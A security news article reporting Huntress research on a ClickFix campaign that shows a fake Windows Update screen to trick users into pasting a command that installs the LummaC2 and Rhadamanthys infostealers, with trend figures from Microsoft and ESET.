Attackers are Using Fake Windows Updates in ClickFix Scams
None
<p>Threat actors are using a twist on the ClickFix attack model, in this case hiding the malicious code they want victims to download in a convincing – but fake – Windows Update screen, complete with white lettering against a bright blue background.</p><p>“This newer variant mimics the blue Windows Update splash page in full-screen, displaying realistic ‘Working on updates’ animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: Open the Run prompt (Win+R), then paste and run the malicious command,” Huntress security researchers Ben Folland and Anna Pham <a href="https://www.huntress.com/blog/clickfix-malware-buried-in-images" target="_blank" rel="noopener">wrote in a report</a> this week.</p><p>Doing so kicks off a series of steps that eventually lead to installing the LummaC2 and Rhadamanthys info-stealing malware.</p><p>A ClickFix is a relatively new but increasingly popular social engineering scam in which victims are duped into manually executing malicious commands on their systems, leading to malware, including ransomware, being deployed and allowing the bad actors to bypass protections.</p><p>Security researchers with Microsoft in August wrote about the <a href="https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/#:~:text=protection%20and%20detection-,The%20ClickFix%20attack%20chain,conventional%20and%20automated%20security%20solutions." target="_blank" rel="noopener">growing use of ClickFix scams</a> by cybercriminals, noting that there are “campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware.”</p><h3>Rapid Rise in ClickFix Campaigns</h3><p>In June, cybersecurity company ESET noted in a <a href="https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/" target="_blank" rel="noopener">report</a> about the threat landscape in the first half of the year that “one of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to [the second half of] 2024 in ESET telemetry. This makes it one of the most rapidly rising threats, accounting for nearly 8% of all blocked attacks in H1 2025, and is now the second most common attack vector after phishing.”</p><p>“The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors,” Jiří Kropáč, director of ESET’s Threat Prevention Labs, <a href="https://www.eset.com/us/about/newsroom/research/eset-threat-report-clickfix-fake-error-surges-spreads-ransomware-and-other-malware/?srsltid=AfmBOorwGQCjg70fwuiGi-oa6j4AnocU5FNRM7HJAhGLqx9xhxN6WV4i&srsltid=AfmBOopk6qMXd6IlPQlFpcE3ZbZCaTsDB-defMbO2TOMK24TkO0XGLnb" target="_blank" rel="noopener">said in a statement</a>.</p><h3>Dropping LummaC2, Rhadamanthys Infostealers</h3><p>In the campaign tracked by Huntress, two ClickFix lures that used a steganographic loader to deliver info-stealing malware, LummaC2 and Rhadamanthys. With steganographic ClickFix scams, the malicious software is hidden within the pixel data of image files, with the goal again being to trick the user into running the malicious commands.</p><p>One variant used a human verification page as the lure, the researchers wrote. The other variant featured the Windows Update page.</p><h3>Looks Like the Real Thing</h3><p>They wrote that since the beginning of October, they’ve been tracking several ClickFix clusters using the Windows Update ploy, aimed at convincing them a Windows update cycle has started. The message fills up the entire screen and displays what Folland and Pham said is a “genuine-looking Windows Update screen.”</p><p>It’s complete with instructions not to turn off the computer while the updates are working and showing the user the progress of the updates.</p><p>“At the end of the ‘update,’ users are encouraged to follow the regular Win+R & Ctrl+V pattern to paste a malicious command,” they wrote, adding that the execution chain is the same as one used with the human verification variant.</p><p>“This starts with an mshta.exe command that contains a URL where the 2nd octet is always hex-encoded,” the researchers wrote. “This leads to the execution of PowerShell, which dynamically decrypts and loads a reflective .NET assembly that, in turn, loads another .NET assembly used for process injection. The shellcode injected into the target process is extracted using steganography.”</p><h3>Finding the Payloads</h3><p>The infostealer malware is taken from the image and put into a Donut coding tool that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. Using a donut-decryptor tool, the researchers were able to see that the malicious payload was the LummaC2 and Rhadamanthys infostealers.</p><p>Earlier this month, law enforcement agencies in Europe took down the infrastructure used by threat actors to deploy a number of malware families, including Rhadamanthys, as part of the ongoing international Operation Endgame. Folland and Pham noted that their research was done before and after the law enforcement action and that Rhadamanthys is no longer being delivered in the fake Windows Update campaign.</p><p>“Ultimately, while the use of steganography helps these payloads evade signature-based detection and complicates analysis, the attacks rely on a simple delivery mechanism: the victim manually opening the Windows Run box to paste a malicious command,” they wrote.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2025/11/attackers-are-using-fake-windows-updates-in-clickfix-scams/" data-a2a-title="Attackers are Using Fake Windows Updates in ClickFix Scams"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2025%2F11%2Fattackers-are-using-fake-windows-updates-in-clickfix-scams%2F&linkname=Attackers%20are%20Using%20Fake%20Windows%20Updates%20in%20ClickFix%20Scams" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>